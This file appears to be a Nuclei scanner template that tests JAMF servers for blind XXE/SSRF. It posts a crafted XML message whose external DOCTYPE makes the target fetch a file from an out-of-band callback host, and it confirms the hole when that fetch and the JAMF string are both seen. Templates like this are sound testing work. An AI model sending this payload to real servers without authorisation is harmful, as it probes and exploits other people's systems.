id: jamf-blind-xxe

info:
  name: JAMF Blind XXE / SSRF
  author: pdteam
  severity: medium
  reference:
    - https://www.synack.com/blog/a-deep-dive-into-xxe-injection/
  metadata:
    max-request: 1
  tags: xxe,ssrf,jamf

http:
  - raw:
      - |
        POST /client HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <?xml version='1.0' encoding='UTF-8' standalone="no"?>
        <!DOCTYPE jamfMessage SYSTEM "http://{{interactsh-url}}/test.xml">
        <ns2:jamfMessage xmlns:ns3="http://www.jamfsoftware.com/JAMFCommunicationSettings" xmlns:ns2="http://www.jamfsoftware.com/JAMFMessage">
          <device>
            <uuid>&test;</uuid>
            <macAddresses />
          </device>
          <application>com.jamfsoftware.jamfdistributionserver</application>
          <messageTimestamp>{{unix_time()}}</messageTimestamp>
          <content xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="ns2:ResponseContent">
            <uuid>00000000-0000-0000-0000-000000000000</uuid>
            <commandType>com.jamfsoftware.jamf.distributionserverinventoryrequest</commandType>
            <status>
              <code>1999</code>
              <timestamp>{{unix_time()}}</timestamp>
            </status>
            <commandData>
              <distributionServerInventory>
                <ns2:distributionServerID>34</ns2:distributionServerID>
              </distributionServerInventory>
            </commandData>
          </content>
        </ns2:jamfMessage>

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "http"

      - type: word
        words:
          - "com.jamfsoftware.jss"

# digest: 490a0046304402205082713fb5c073803c3d04a52b268789176f5960738fefb81f18cfa22448a6f402202f6090137f99e0c5231988c4c8f7cf70ec1dc256d0833b5da9fced7a55eff231:922c64590222798bb761d5b6d8e72950